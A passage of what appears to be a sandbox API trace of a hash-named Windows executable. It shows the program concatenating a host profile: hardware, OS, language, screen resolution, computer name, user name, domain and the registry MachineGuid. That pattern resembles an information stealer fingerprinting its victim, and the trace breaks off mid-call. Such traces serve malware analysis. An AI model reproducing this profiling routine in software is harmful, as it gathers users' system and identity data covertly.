C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\n" [0208.045] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\n", lpString2="Display Resolution: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: " [0208.045] CreateDCA (pwszDriver="DISPLAY", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x401018d [0208.047] GetDeviceCaps (hdc=0x401018d, index=8) returned 1440 [0208.047] GetDeviceCaps (hdc=0x401018d, index=10) returned 900 [0208.047] ReleaseDC (hWnd=0x0, hDC=0x401018d) returned 1 [0208.048] wsprintfA (in: param_1=0x19d51c, param_2="%dx%d" | out: param_1="1440x900") returned 8 [0208.048] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: ", lpString2="1440x900" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900" [0208.048] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\n" [0208.048] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\n", lpString2="PC name: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: " [0208.048] GetProcessHeap () returned 0x5b0000 [0208.048] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5daba0 [0208.048] GetComputerNameA (in: lpBuffer=0x5daba0, nSize=0x19d62c | out: lpBuffer="XC64ZB", nSize=0x19d62c) returned 1 [0208.048] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: ", lpString2="XC64ZB" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB" [0208.048] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\n" [0208.048] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\n", lpString2="User name: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: " [0208.048] GetProcessHeap () returned 0x5b0000 [0208.048] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5da740 [0208.048] GetUserNameA (in: lpBuffer=0x5da740, pcbBuffer=0x19d630 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19d630) returned 1 [0208.050] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: ", lpString2="RDhJ0CNFevzX" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX" [0208.050] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\n" [0208.050] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\n", lpString2="Domain name: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: " [0208.050] DsRoleGetPrimaryDomainInformation (in: lpServer=0x0, InfoLevel=0x1, Buffer=0x19d62c | out: Buffer=0x19d62c*=0x612310*(MachineRole=0x0, Flags=0x0, DomainNameFlat="WORKGROUP", DomainNameDns=0x0, DomainForestName=0x0, DomainGuid.Data1=0x0, DomainGuid.Data2=0x0, DomainGuid.Data3=0x0, DomainGuid.Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0208.052] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ", lpString2="?" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?" [0208.052] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\n" [0208.052] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\n", lpString2="MachineID: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: " [0208.052] GetProcessHeap () returned 0x5b0000 [0208.052] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5db230 [0208.052] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x19d630 | out: phkResult=0x19d630*=0x3a0) returned 0x0 [0208.053] RegQueryValueExA (in: hKey=0x3a0, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x5db230, lpcbData=0x19d62c*=0xff | out: lpType=0x0, lpData=0x5db230*=0x30, lpcbData=0x19d62c*=0x25) returned 0x0 [0208.053] RegCloseKey (hKey=0x3a0) returned 